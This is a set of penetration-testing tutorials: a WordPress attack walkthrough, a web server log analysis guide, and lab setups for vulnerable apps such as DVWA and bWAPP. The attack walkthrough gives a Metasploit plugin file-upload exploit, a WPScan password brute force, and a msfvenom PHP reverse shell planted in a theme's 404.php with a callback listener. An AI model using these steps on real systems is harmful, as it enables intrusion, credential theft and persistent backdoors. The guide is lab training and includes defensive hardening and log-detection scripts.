WordPress Penetration Testing using WPScan & Metasploit

In our previous article we discussed “WordPress Penetration Testing Lab Setup in Ubuntu”; today you will learn WordPress penetration testing using WPScan and Metasploit.

Attacker: Kali Linux

Target: WordPress 

WPScan is a black box vulnerability scanner for WordPress, written in Ruby, that focuses on the different types of vulnerability found in WordPress core, themes and plugins. WPScan is installed by default in Kali Linux, SamuraiWTF, Pentoo, BlackArch and BackBox Linux. During a test it checks the target against its database of known plugins and themes (approximately 18000 plugins and 2600 themes) to find outdated versions and vulnerabilities.

Things WPScan can do for you are:

- Detect the version of the currently installed WordPress.

- Detect sensitive files such as readme, robots.txt, database replacement files, etc.

- Detect enabled features on the currently installed WordPress.

- Enumerate theme name and version.

- Detect installed plugins and tell you whether they are outdated.

- Enumerate user names.

Let’s start.

Go to your Kali Linux terminal and type the following to download WPScan from GitHub.

cd Desktop

git clone https://github.com/wpscanteam/wpscan.git

Now simply type the following in the terminal to run the script:

./wpscan.rb -h

Using the default options we are going to test our WordPress website:

Scanning the WordPress version of the target website

WPScan is a great tool to scan WordPress websites. Now we will try some basic scans, using the enumerate options to find information about themes, plugins, usernames, etc.

Now type the following command to scan WordPress and its server:

./wpscan.rb -u http://192.168.0.101/wordpress/

Instead of http://192.168.0.101/wordpress/, type the URL of the website you want to scan.

Here it found the server Apache/2.4.7 with PHP 5.5.9 and WordPress version 4.8.1; using this information an attacker can search Google for a matching exploit. It also found that the uploads directory has directory listing enabled, which means anyone can browse /wp-content/uploads to view the uploaded files and contents.

Enumerating WordPress Themes

A theme controls the general look and feel of a website, including things like page layout, widget locations, and default font and color choices. WordPress.com has a wide range of themes for its users, and each theme has an about page that includes its features and instructions.

To scan the installed theme of a WordPress website type the following command:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate t

Enumerating vulnerable WordPress Themes

To scan for installed vulnerable themes on a WordPress website type the following command:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vt

From the scan result we didn’t find any vulnerable theme, which means there is no vulnerable theme that can be exploited.

Enumerating WordPress Plugins

Plugins are small pieces of program code that can be added to a WordPress website to extend its functionality.

To find the installed plugins on our target’s WordPress website, type in the terminal:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate p

Finally, after a few seconds, you will get the list of installed plugins. You can see that in my scan result plugins such as akismet v3.3.3, pixabay-images v2.14 and wptouch v3.4.3 were detected. It also reports the last update and the latest version of each plugin.

Enumerating vulnerable WordPress Plugins

Now type the following command to scan for vulnerable plugins on any WordPress website:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vp

After a few seconds, you will get the list of installed vulnerable plugins on the website. From the given image you can observe that red indicates vulnerable plugins, along with links to the exploits and CVEs.

Exploit a vulnerable plugin using Metasploit

This module exploits an arbitrary PHP code upload in WordPress Reflex Gallery version 3.1.3. The vulnerability allows arbitrary file upload and remote code execution.

Open the terminal, load the Metasploit framework and execute the following commands:

use exploit/unix/webapp/wp_reflexgallery_file_upload

msf exploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101

msf exploit(wp_reflexgallery_file_upload) > set targeturi /wordpress/

msf exploit(wp_reflexgallery_file_upload) > exploit

Awesome!! From the given image you can observe the meterpreter session on the victim’s web server.

meterpreter> sysinfo

Enumerating WordPress Usernames

In order to enumerate the user names of a WordPress website execute the following command:

./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate u

After some time it will dump a table of usernames. In this scan I found three users with their IDs as given below:

ID 1: admin

ID 2: ignite

ID: demo

Enumerate all with a single command

Everything we scanned above can be enumerated at once by executing the command given below:

./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u

Here we used the options -e at -e ap -e u for the following reasons:

-e at: enumerate all themes of the targeted website

-e ap: enumerate all plugins of the targeted website

-e u: enumerate all usernames of the targeted website

Brute force attack using WPScan

With the help of the username we enumerated above we can create a password wordlist for the user admin and try a brute force login attack using the command given below.

./wpscan.rb -u http://192.168.0.101/wordpress/ --wordlist /root/Desktop/dict.txt --username admin

It will start trying username and password combinations against the login form and then dump the result; from the given image you can see it found the login credentials of the targeted website as admin:password.

Generate a PHP backdoor in WordPress

You can use the above credentials to log into the admin panel, where we can upload any theme; taking advantage of admin rights we will try to upload a malicious script to achieve a reverse connection from the victim’s system.

Once you are inside the admin panel click on Appearance in the dashboard and then select the Editor option.

Now select the template 404.php given on the right side of the frame; after that you will find the PHP code for the 404 template in the middle frame. Erase the entire PHP code so that you can add the malicious PHP code that generates the backdoor inside the website as a new theme.

Now use msfvenom to generate the malicious PHP script by typing the following command.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

From the screenshot you can read the generated PHP script; at this point we need to copy the text from *<?php……….die(); and then paste it inside the WordPress template as a new theme.

Now paste the copied PHP text *<?php……….die(); here as the new theme under the selected 404.php template.

On the other hand, load the Metasploit framework and start multi/handler:

use exploit/multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

When you open your uploaded theme file 404.php in the browser you will receive a reverse connection at multi/handler and get a meterpreter session on the victim’s system.

http://192.168.0.101/wordpress/wp-content/themes/twentyseventeen/404.php

Here, from the screenshot, you can see that through meterpreter we have access to the victim’s shell.

meterpreter> sysinfo

In this way, using WPScan and Metasploit, an admin can check the strengths and weaknesses of a WordPress website.
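Each weakness found in this walkthrough maps to a configuration control: the directory listing on wp-content/uploads, a plugin that lets an uploaded PHP file run from that folder, the wordlist attack against wp-login.php, and the dashboard theme editor used to plant 404.php. The script below is an added example written for this page, not code from the original article or from WordPress; it assumes Apache 2.4 with AllowOverride enabled so that .htaccess files take effect, and the paths and the admin network 192.168.0.0/24 are lab placeholders.

```shell
#!/bin/sh
# Added hardening helper for a lab WordPress install (example code, not from
# the original article). Assumes Apache 2.4 with AllowOverride enabled so the
# .htaccess files below are honoured; paths and networks are lab placeholders.

# 1. Uploads directory: turn off directory indexes (the listing WPScan reported)
#    and refuse to serve any PHP from it, so a plugin upload flaw like the
#    Reflex Gallery one cannot execute whatever it manages to write there.
write_uploads_htaccess() {  # $1 = path to wp-content/uploads
  cat > "$1/.htaccess" <<'EOF'
Options -Indexes
<FilesMatch "\.(php|phtml|php[0-9])$">
    Require all denied
</FilesMatch>
EOF
}

# 2. Dashboard editor: the backdoor step edited 404.php from Appearance > Editor.
#    DISALLOW_FILE_EDIT removes that editor. The constant must be defined before
#    wp-settings.php is loaded, so it is inserted just above that require line.
#    Safe to run twice: it does nothing if the constant is already present.
disable_file_edit() {  # $1 = path to wp-config.php
  cfg="$1"
  grep -q 'DISALLOW_FILE_EDIT' "$cfg" && return 0
  awk -v q="'" '/wp-settings\.php/ && !done {
         print "define(" q "DISALLOW_FILE_EDIT" q ", true);"; done = 1
       } { print }' "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg"
}

# 3. Login form: only the admin network may reach wp-login.php, which stops a
#    wordlist attack from any other client before WordPress even sees it.
restrict_login() {  # $1 = WordPress root, $2 = allowed network in CIDR form
  cat >> "$1/.htaccess" <<EOF
<Files "wp-login.php">
    Require ip $2
</Files>
EOF
}

# Check that all three controls are in place; exits 0 only when they all are,
# which makes this usable as a post-deploy check.
verify_hardening() {  # $1 = WordPress root
  root="$1"
  grep -q '^Options -Indexes' "$root/wp-content/uploads/.htaccess" 2>/dev/null &&
  grep -q 'Require all denied' "$root/wp-content/uploads/.htaccess" 2>/dev/null &&
  grep -q 'DISALLOW_FILE_EDIT' "$root/wp-config.php" 2>/dev/null &&
  grep -q 'wp-login.php' "$root/.htaccess" 2>/dev/null
}

# Usage: sh harden_wp.sh /var/www/html/wordpress 192.168.0.0/24
if [ "$#" -eq 2 ]; then
  write_uploads_htaccess "$1/wp-content/uploads"
  disable_file_edit "$1/wp-config.php"
  restrict_login "$1" "$2"
  verify_hardening "$1" && echo "hardening applied to $1"
fi
```

The lab's chown -R www-data on the whole tree also leaves every PHP file writable by the web server; WordPress only needs wp-content writable, so narrowing that ownership is the next step after these three controls.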

AUTHOR: Akshay Bhardwaj is a passionate Hacker, Information Security Enthusiast and Researcher | Sketch Artist | Technical writer.

Understanding Log Analysis of Web Server

From Wikipedia

Logs

Log files are a standard tool for computer system developers and administrators. They record the W5 of the system: what happened, when, by whom, where and why. This information can record faults and help with their diagnosis.

Log Format

The Common Log Format is also known as the NCSA Common Log Format. Each line in a file stored in the Common Log Format has the following syntax:

[host; ident; authuser; date; request; status; bytes]

Example

127.0.0.1 user-identifier raj [30/Aug/2017:10:25:16 -0700] "GET /apache_pb.gif HTTP/1.0" 200 1068

  1. A "-" in a field indicates missing data.
  2. 127.0.0.1 is the IP address of the client (remote host) which made the request to the server.
  3. user-identifier is the RFC 1413 identity of the client.
  4. raj is the user id of the person requesting the document.
  5. [30/Aug/2017:10:25:16 -0700] is the date, time, and time zone at which the request was received.
  6. "GET /apache_pb.gif HTTP/1.0" is the request line from the client.
  7. 200 is the HTTP status code returned to the client. 2xx is a successful response, 3xx a redirection, 4xx a client error, and 5xx a server error.
  8. 1068 is the size of the object returned to the client, measured in bytes.

Importance of log analysis

Logs play an important role in tracking each client computer’s activity and its communication with other computers and networks. A network or system administrator analyses logs in order to keep an eye on the network for vulnerabilities that could let an attacker in to access sensitive information. You might be able to identify who introduces risks, and help that person take better precautions.

Location of log files

Generally, on Linux or UNIX systems logs are created under the /var/log directory; here you will find some very important log files such as apache, auth, mysql, kernel, bootstrap, dmesg, apt, etc.

Some Important Types of Logs

Application log

The Application log contains events logged by applications or programs. For example, a database program might record a file error in the application log.

Apache: /var/log/apache

Samba:  /var/log/samba

Mail: /var/log/

Mysql:  /var/log/

For example, let’s consider the Apache log files; there are two types of Apache HTTP server log files:

  • Apache Access Log File

The Apache server records all incoming requests and all requests processed to a log file. The access log is located at /var/log/apache/access.log.

  • Apache Error Log File

All Apache errors found while processing server requests are logged to this file. The error log is located at /var/log/apache/error.log.

Now open the apache2 log directory using the following commands in the terminal (UNIX system).

cd /var/log/apache2

ls

You can see all the log files of apache2 as shown in the given image.

echo > access.log

Using the echo command I truncated access.log, removing all previous logs, so that we can read only the logs for our current activity.

As I described above, apache2 creates logs for client activity in the browser. Therefore I opened some web applications, dvwa, bwapp and the wordpress site, in that order, and as a result logs are created inside apache2 in the same order.

There are many commands and tools used for log analysis; among them we use only three command line utilities, cat, head and tail, for reading logs.

From the given image you can see we used the cat command to read the log, which begins with dvwa’s entries and ends with wordpress’s entries.

cat is a standard UNIX utility used for reading the contents of a file. With the help of the cat command you can view the whole content of any log file.

Syntax: cat [options] filename

cat access.log

head is a program on UNIX and Unix-like systems used to display the beginning of a text file.

Syntax: head [options] filename

head access.log

By default, head prints the first 10 lines of its input to standard output. You can use the option -n for a specific number of lines. For example: head -n 30 filename.

tail is a program on UNIX and Unix-like systems used to display the tail end of a text file.

Syntax: tail [options] filename

tail access.log

From the given image you can see that it has shown the log entries for wordpress at the end of the file.

A significant way of reading logs

Since tail reads the end of a log file, which contains information on the client’s most recent activity, we are going to use tail’s options to read the log in a more meaningful way.

By default, tail outputs the last 10 lines of its input to standard output. You can use the option -n for a specific number of lines. For example: tail -n 30 filename.

tail -n 2 access.log

From the given image you can see that the above command applied the filter and read only the two most recent log entries.

If you want to read multiple log files simultaneously then type the following command.

tail -n 2 access.log error.log

From the given image you can observe that it has shown two entries for each file, i.e. the access log and the error log.

Now apply a filter using the grep command together with tail to select specific log records.

Syntax: tail [options] filename | grep "string" [options]

tail access.log | grep 200

From the given image you can notice that it has highlighted the log entries containing the string 200. Generally, for a network administrator this command reduces the effort of log analysis because he/she can directly read those entries where a client or attacker got a successful response from the server.

When the server is not able to serve the request made by a client it responds with error 404 “Not Found”.

tail access.log | grep 404

From the given image you can see that it has highlighted the log entries containing the string 404 from the set of log records.

As you know, in the browser we browsed the web applications dvwa, bwapp and wordpress in that sequence; therefore we get their logs in the same sequence: dvwa entries at the top, bwapp entries in the middle and wordpress entries at the end of the access.log file.

Log files are very large, and reading them all at once is not possible for an administrator; therefore he/she can use the after and before options of grep as a filter for logs.

Syntax: tail [options] filename | grep -A [number of lines] "string"

tail access.log | grep -A 2 "bwapp"

Here -A stands for after; it prints the 2 log entries that follow each match of bwapp, which here are 2 wordpress entries, as shown in the given image.

Similarly, apply the filter using the before parameter by typing the following command with a specific argument.

tail access.log | grep -B 2 "wordpress"

Here -B stands for before; it prints the 2 log entries that precede each match of wordpress, which here are 2 bwapp entries, as shown in the given image.
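The grep filters above match one string at a time. The following added example, which is not part of the original article, extends them with awk over the Common Log Format fields described earlier (field 1 is the client host, field 7 the request path, field 9 the status code) to tally responses per client and to spot in an access log the two WordPress behaviours from the WPScan article: author-ID user enumeration and wordlist guessing against wp-login.php. The log lines, IP addresses and thresholds are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original article): awk-based analysis of Apache
# access.log lines in the Common Log Format. Field positions when split on
# whitespace: $1 host, $2 ident, $3 authuser, $4-$5 date, $6 method (with the
# opening quote), $7 path, $8 protocol, $9 status, $10 bytes.

# Constructed sample, not real traffic: a normal visitor (192.168.0.104), then a
# second client that walks ?author=N to enumerate user IDs and posts a wordlist
# at wp-login.php. WordPress answers a failed login with 200 (the form again)
# and a successful one with 302 to wp-admin, which is the signal used below.
SAMPLE_LOG=$(cat <<'EOF'
192.168.0.104 - - [30/Aug/2017:10:25:16 -0700] "GET /wordpress/ HTTP/1.1" 200 4521
192.168.0.104 - raj [30/Aug/2017:10:25:20 -0700] "GET /dvwa/login.php HTTP/1.1" 200 1890
192.168.0.105 - - [30/Aug/2017:10:26:01 -0700] "GET /wordpress/?author=1 HTTP/1.1" 301 0
192.168.0.105 - - [30/Aug/2017:10:26:01 -0700] "GET /wordpress/?author=2 HTTP/1.1" 301 0
192.168.0.105 - - [30/Aug/2017:10:26:02 -0700] "GET /wordpress/?author=3 HTTP/1.1" 301 0
192.168.0.105 - - [30/Aug/2017:10:26:02 -0700] "GET /wordpress/?author=4 HTTP/1.1" 404 1068
192.168.0.105 - - [30/Aug/2017:10:26:03 -0700] "GET /wordpress/wp-content/uploads/ HTTP/1.1" 200 2326
192.168.0.105 - - [30/Aug/2017:10:27:10 -0700] "POST /wordpress/wp-login.php HTTP/1.1" 200 3210
192.168.0.105 - - [30/Aug/2017:10:27:10 -0700] "POST /wordpress/wp-login.php HTTP/1.1" 200 3210
192.168.0.105 - - [30/Aug/2017:10:27:11 -0700] "POST /wordpress/wp-login.php HTTP/1.1" 200 3210
192.168.0.105 - - [30/Aug/2017:10:27:11 -0700] "POST /wordpress/wp-login.php HTTP/1.1" 200 3210
192.168.0.105 - - [30/Aug/2017:10:27:12 -0700] "POST /wordpress/wp-login.php HTTP/1.1" 200 3210
192.168.0.105 - - [30/Aug/2017:10:27:12 -0700] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
192.168.0.104 - - [30/Aug/2017:10:30:00 -0700] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
192.168.0.104 - - [30/Aug/2017:10:30:05 -0700] "GET /bwapp/login.php HTTP/1.1" 200 1890
EOF
)

# Tally requests per client and status code as "host status count", sorted.
# This is the counted form of "tail access.log | grep 200".
count_by_host_status() {  # stdin: log lines
  awk '{ n[$1 " " $9]++ } END { for (k in n) print k, n[k] }' | sort
}

# Report clients with at least $1 failed POSTs to wp-login.php (status 200),
# together with how many succeeded (status 302). A non-zero success count
# after a long run of failures is the case to act on first.
wp_login_guessing() {  # $1 = failure threshold; stdin: log lines
  awk -v t="$1" '
    $6 == "\"POST" && $7 ~ /\/wp-login\.php/ {
      if ($9 == 200) fail[$1]++
      else if ($9 == 302) ok[$1]++
    }
    END { for (h in fail) if (fail[h] >= t) print h, fail[h], ok[h] + 0 }'
}

# Report clients that requested ?author=N for at least $1 distinct N, which is
# how the "--enumerate u" scan discovers usernames through author redirects.
wp_author_enum() {  # $1 = distinct-ID threshold; stdin: log lines
  awk -v t="$1" '
    match($7, /[?&]author=[0-9]+/) {
      id = substr($7, RSTART, RLENGTH); sub(/.*=/, "", id)
      if (!(($1, id) in seen)) { seen[$1, id] = 1; ids[$1]++ }
    }
    END { for (h in ids) if (ids[h] >= t) print h, ids[h] }'
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_LOG" | count_by_host_status
printf '%s\n' "$SAMPLE_LOG" | wp_login_guessing 5
printf '%s\n' "$SAMPLE_LOG" | wp_author_enum 3
```

On a real server replace the printf with tail -n 5000 /var/log/apache2/access.log, and tune the thresholds to the site's normal login volume.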

Auth Log

The auth.log file holds system authorization information, including user login attempts, both successful and failed, as well as the authentication method used to establish a connection with the server, for example an SSH login between server and client.

Location: /var/log

Again I used the echo command to remove all previous records from auth.log.

echo > auth.log

Suppose a client uses PuTTY for SSH login into the server.

If the client has valid credentials for SSH then he will log into the server successfully. From the given image you can see that I logged into the server successfully. Hence inside the server's auth.log file a new record is created for the successful SSH login.

In the next image you can read an access denied message, which means the login to the SSH server failed. Hence this time a new record is created in auth.log for the SSH login failure.

Now let’s read all the records of the auth log file for the above client activities using the cat command.

cat auth.log

From the given image you can read the logs for the successful and failed logins.

Vsftpd Log

The vsftpd log holds the system authentication log for FTP login records, both successful and failed.

Location: /var/log

I deleted all previous logs using the echo command and used WinSCP for the FTP server login. You can observe that we logged in successfully. Hence it creates a new record in vsftpd.log for the successful client login.

Now let’s verify it through the vsftpd log file, using the cat command to read the whole file. From the given image you can observe that it has created a CONNECT record in the log file for client 192.168.0.104.

cat vsftpd.log

System Log

syslog is a standard for system logs or message logging. Administrators may use syslog for system management and security auditing as well as for general informational, analysis and debugging messages. A wide variety of devices, such as printers, routers and message receivers across many platforms, use the syslog standard.

Location: /var/log

Use the cat command for reading syslog as shown in the given image.

cat syslog

APT Log

apt is the standard command-line package tool on Ubuntu, which performs functions such as installing new software packages, upgrading existing software packages, updating the package list index, and even upgrading the entire Ubuntu system.

Location: /var/log

Hence apt maintains its own log files for all newly and previously installed software. It has two log files:

  • history.log: /var/log/apt/history.log
  • term.log: /var/log/apt/term.log

Now type the following command to read apt’s history log.

cat history.log

From the given image you can observe the result, which contains information about software installations and updates.

This was a brief introduction to reading logs in the simplest way.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

WordPress Penetration Testing Lab Setup in Ubuntu

Today we are demonstrating how to install and configure WordPress for penetration testing inside a web server. To configure WordPress you must install web host software such as XAMPP/WAMP, or read our previous article “Configure Web Server for Penetration Testing (Beginner Guide)”, which will help you set up your own localhost web server. Here we are using our own web server, configured on Ubuntu 14.04.

WordPress is a free and open-source content management system (CMS) based on PHP and MYSQL. It is installed on a web server that is either part of an Internet hosting service or a network host in its own right. WordPress is reportedly the most popular website management or blogging system in use on the Web, supporting more than 60 million websites.

For more detail visit https://en.wikipedia.org/wiki/WordPress

Let’s start!!

If you have read our previous article, then you might remember that we specified a blank password for the root user. Now start by logging into phpMyAdmin as the root user.

phpMyAdmin is separated into two parts, the left and right panels. The left panel contains the names of the existing databases and the right panel contains functional settings for performing maintenance operations on tables, backing up information, editing things and creating or deleting databases.

In order to store WordPress data we need to create a new database. Now click on the Databases tab given at the top of the right panel.

Now enter a name for the database, such as wordpress, and then click on Create. After that you will observe that a new database “wordpress” is added to the left panel.

Open the terminal and type the following command to download WordPress inside /var/www/html.

wget https://wordpress.org/latest.zip

Now unzip latest.zip.

unzip latest.zip

ls

From the given image you can see we have the wordpress folder inside the /html/ directory.

Now, to install WordPress, open it in the browser through the URL http://localhost/wordpress as shown in the given image. At the end of the window click on Let’s go to proceed with the installation.

In the next window enter your database connection information:

Database Name: wordpress

Username: root

Password: (null)

Database host: localhost

Now click on the Submit tab.

In the next window you will get some lines of code to configure the wp-config.php file, as shown in the given image. Now copy the highlighted text into a text document. After you are done, come back and click on Run the install.

As you can see, we pasted the copied text into a text file and saved it as wp-config.php on the desktop.

Since we saved wp-config.php on the desktop we are going to move it inside /var/www/html/wordpress using the following command.

mv /home/raj/Desktop/wp-config.php /var/www/html/wordpress/

Then go back to the previously opened tab and click on Run the install.

A “Welcome” window will come up; now fill in the information below and you’ll be on your way to installing WordPress.

Site title: Pentest Lab

Username: admin

Password: password

Email: (your email ID)

At last click on the “Install WordPress” tab given at the end of the window.

Once WordPress has installed successfully, click on Log in as shown in the given image.

Now enter your WordPress credentials to log in.

Great!! Finally our website “Pentest Lab” is online on the localhost server and is ready for posting articles and blogs.

Now we need to add some plugins to WordPress so that we can practise WordPress penetration testing by exploiting plugin-based vulnerabilities. WordPress’ plugin architecture allows users to extend the features and functionality of a website or blog.

Now type the following command to make www-data the owner of all files and folders under /var/www/html.

sudo chown -R www-data /var/www/html

For penetration testing practice we are going to download some vulnerable plugins so that we have our own vulnerable WordPress site.

We downloaded the vulnerable plugin “reflex gallery 3.1.3 arbitrary file upload” found on exploit-db.com; you can download many other vulnerable plugins from the exploit database.

Now log into WordPress as admin to access the administration control panel, then select the Plugins option from the dashboard and go to Add New so that you can install your plugin in WordPress.

Now click on Upload Plugin, browse to your downloaded zip file and install it.

It will install the plugin into WordPress; now to activate it click on the Activate Plugin tab as shown in the given image.

Similarly you can install as many vulnerable plugins into WordPress as you like. You can see we installed many plugins inside our WordPress so that we can get more practice at WordPress penetration testing, which you will learn in our next article.

Wait for our next article, where you will learn how to exploit WordPress plugin-based vulnerabilities.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

Configure Web Application Penetration Testing Lab

In our previous article you learnt how to configure a web server on an Ubuntu system with the help of LAMP services to design your own pentest lab. Today you will learn how to configure four famous web applications (DVWA, bWAPP, SQLI and Mutillidae) inside the web server for web application penetration testing (WAPT) practice.

Let’s Begin!!

Open the terminal, log in as the root user and move inside the html directory using the following commands.

sudo bash

cd /var/www/html

Basically, to operate all the web applications in the browser through localhost you should download and configure these web applications inside the html directory only.

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, and to help web developers better understand the processes of securing web applications.

Download DVWA inside html using the following command.

wget https://github.com/ethicalhack3r/DVWA/archive/master.zip

Now type the following commands step by step to configure DVWA.

ls

From the given image you can see we downloaded the master.zip file; now unzip this file using the command below.

unzip master.zip

After unzipping, rename the DVWA-master folder to dvwa.

ls

mv DVWA-master dvwa

ls

cd dvwa

ls

Then move inside config in order to rename config.inc.php.dist to config.inc.php.

cd config/

ls

mv config.inc.php.dist config.inc.php

gedit config.inc.php

Now open config.inc.php using the above command; here you will observe that db_password is p@ssw0rd. Remove the password and leave db_password blank.

After leaving the password blank, save config.inc.php.

Now run the web application in the browser through the URL localhost/dvwa/setup.php

As shown in the given image a web page opens for DVWA setup; now click on the Create / Reset Database tab.

Log into the web application through the URL localhost/dvwa/login.php; by default the username and password for DVWA are admin and password respectively.

Using the above installation steps you can configure DVWA in your web server and perform web penetration testing by exploiting the given vulnerabilities.

bWAPP

bWAPP, or buggy web application, is a deliberately insecure web application. It helps security enthusiasts, systems engineers, developers and students to discover and prevent web vulnerabilities. bWAPP prepares one to conduct successful web application penetration testing and ethical hacking projects. It is made for educational purposes.

Now download bWAPP and unzip that folder.

cd /var/www/html

Now move bwapp from the downloads directory to the html directory using the move command.

mv /home/raj/downloads/bwapp_latest/bwapp .

ls

Now you can observe that we have bwapp inside the html directory.

Now make the following changes inside the file “settings.php” for its configuration.

cd admin

ls

gedit settings.php

Here remove the password “bug” for db_password as done above, leave db_password blank and then save the file.

Now browse to the web application through the URL localhost/bwapp/install.php

As shown in the image a web page opens for installation; now click on the given link “click here to install bWAPP”. After that your bWAPP will be installed successfully and ready for penetration testing.

Now use the default username and password bee:bug to log into bWAPP and start your practice.

SQLI

SQLI labs lets you test error-based, blind boolean-based and time-based SQL injection.

cd /var/www/html

Download the SQLI labs (dhakkan) inside the html directory and then unzip it.

wget https://github.com/Audi-1/sqli-labs/archive/master.zip

unzip master.zip

Rename the sqli-labs-master folder to sqli using the following command.

mv sqli-labs-master sqli

Now open the web application in the browser using the URL localhost/sqli and click on “Setup/reset Database for labs”.

This will create the database setup for the lab, after which it will be ready for SQL injection penetration testing. This lab is designed mainly for SQL injection attacks; each lesson has a different SQL error.

OWASP Mutillidae II Web Pen-Test Practice Application

OWASP Mutillidae II is a free, open source, deliberately vulnerable web application providing a target for web security enthusiasts. Mutillidae can be installed on Linux and Windows using LAMP, WAMP and XAMPP. It is pre-installed on SamuraiWTF, Rapid7 Metasploitable-2 and OWASP BWA, and the existing version can be updated on these platforms. With dozens of vulnerabilities and hints to help the user, this is an easy-to-use web hacking environment designed for labs, security enthusiasts, classrooms, CTFs and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web security training courses, and as an “assess the assessor” target for vulnerability assessment software.

Download Mutillidae using the following command.

wget https://sourceforge.net/projects/mutillidae/files/latest/download

cd /var/www/html

Move the mutillidae files and folders from the Downloads directory into /var/www/html by typing the following command.

mv /home/raj/Downloads/mutillidae .

This web application does not require extra configuration settings; you can directly open it in the browser using the URL localhost/mutillidae

Now use your pentesting skills to exploit its vulnerabilities.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.
